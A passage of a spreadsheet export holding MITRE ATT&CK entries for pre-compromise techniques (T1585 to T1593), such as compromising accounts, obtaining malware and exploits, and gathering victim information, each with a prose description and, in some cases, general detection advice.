    <t>Before compromising a victim, adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1)
To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016)</t>
  </si>
  <si>
    <t>T1586</t>
  </si>
  <si>
    <t>Compromise Accounts</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. 
A variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.
Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.
Adversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).</t>
  </si>
  <si>
    <t>T1586.001</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. 
A variety of methods exist for compromising social media accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.
Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.
Adversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>T1586.002</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).
A variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.
Adversaries can use a compromised email account to hijack existing email threads with targets of interest.</t>
  </si>
  <si>
    <t>T1587</t>
  </si>
  <si>
    <t>Develop Capabilities</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
As with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.</t>
  </si>
  <si>
    <t>T1587.001</t>
  </si>
  <si>
    <t>Malware</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors, packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.
Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>T1587.002</t>
  </si>
  <si>
    <t>Code Signing Certificates</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may create self-signed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develop self-signed code signing certificates for use in operations.</t>
  </si>
  <si>
    <t>T1587.003</t>
  </si>
  <si>
    <t>Digital Certificates</t>
  </si>
  <si>
    <t>SSL/TLS certificates</t>
  </si>
  <si>
    <t>Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may create self-signed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In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)).</t>
  </si>
  <si>
    <t>T1587.004</t>
  </si>
  <si>
    <t>Exploits</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits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</si>
  <si>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Before compromising a victim, adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.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</si>
  <si>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T1588</t>
  </si>
  <si>
    <t>Obtain Capabilities</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
In addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab)
In addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise)</t>
  </si>
  <si>
    <t>T1588.001</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).</t>
  </si>
  <si>
    <t>T1588.002</t>
  </si>
  <si>
    <t>Tool</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).</t>
  </si>
  <si>
    <t>T1588.003</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may buy and/or steal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purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.</t>
  </si>
  <si>
    <t>T1588.004</t>
  </si>
  <si>
    <t>Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may buy and/or steal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Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise)
Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)
Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.</t>
  </si>
  <si>
    <t>T1588.005</t>
  </si>
  <si>
    <t xml:space="preserve">
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits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</si>
  <si>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Before compromising a victim, adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
In addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)
An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.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</si>
  <si>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T1588.006</t>
  </si>
  <si>
    <t>Vulnerabilities</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the potential use of exploits for vulnerabilities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</si>
  <si>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Before compromising a victim, adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
An adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005)) or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)).</t>
  </si>
  <si>
    <t>T1589</t>
  </si>
  <si>
    <t>Gather Victim Identity Information</t>
  </si>
  <si>
    <t>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</si>
  <si>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Before compromising a victim, adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks)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</si>
  <si>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reconnaissance</t>
  </si>
  <si>
    <t>T1589.001</t>
  </si>
  <si>
    <t>Credentials</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.
Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets.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[External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).</t>
  </si>
  <si>
    <t>T1589.002</t>
  </si>
  <si>
    <t>Email Addresses</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.
Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>T1589.003</t>
  </si>
  <si>
    <t>Employee Names</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
Adversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)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</si>
  <si>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T1590</t>
  </si>
  <si>
    <t>Gather Victim Network Information</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1590.001</t>
  </si>
  <si>
    <t>Domain Properties</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>T1590.002</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>T1590.003</t>
  </si>
  <si>
    <t>Network Trust Dependencies</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests)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</si>
  <si>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T1590.004</t>
  </si>
  <si>
    <t>Network Topology</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)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</si>
  <si>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T1590.005</t>
  </si>
  <si>
    <t>IP Addresses</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses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</si>
  <si>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T1590.006</t>
  </si>
  <si>
    <t>Network Security Appliances</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)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t>
  </si>
  <si>
    <t>T1591</t>
  </si>
  <si>
    <t>Gather Victim Org Information</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Business Lookup)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or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>T1591.001</t>
  </si>
  <si>
    <t>Determine Physical Locations</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Business Lookup) Gathering this information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[Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).</t>
  </si>
  <si>
    <t>T1591.002</t>
  </si>
  <si>
    <t>Business Relationships</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business relationships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[Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>T1591.003</t>
  </si>
  <si>
    <t>Identify Business Tempo</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo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or [Trusted Relationship](https://attack.mitre.org/techniques/T1199))</t>
  </si>
  <si>
    <t>T1591.004</t>
  </si>
  <si>
    <t>Identify Roles</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business roles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t>
  </si>
  <si>
    <t>T1592</t>
  </si>
  <si>
    <t>Gather Victim Host Information</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).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</si>
  <si>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T1592.001</t>
  </si>
  <si>
    <t>Hardware</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the hardware infrastructure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[Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).</t>
  </si>
  <si>
    <t>T1592.002</t>
  </si>
  <si>
    <t>Software</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).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installed software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for initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>T1592.003</t>
  </si>
  <si>
    <t>Firmware</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel)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[Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).</t>
  </si>
  <si>
    <t>T1592.004</t>
  </si>
  <si>
    <t>Client Configurations</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.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client configurations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</si>
  <si>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T1593</t>
  </si>
  <si>
    <t>Search Open Websites/Domains</t>
  </si>
  <si>
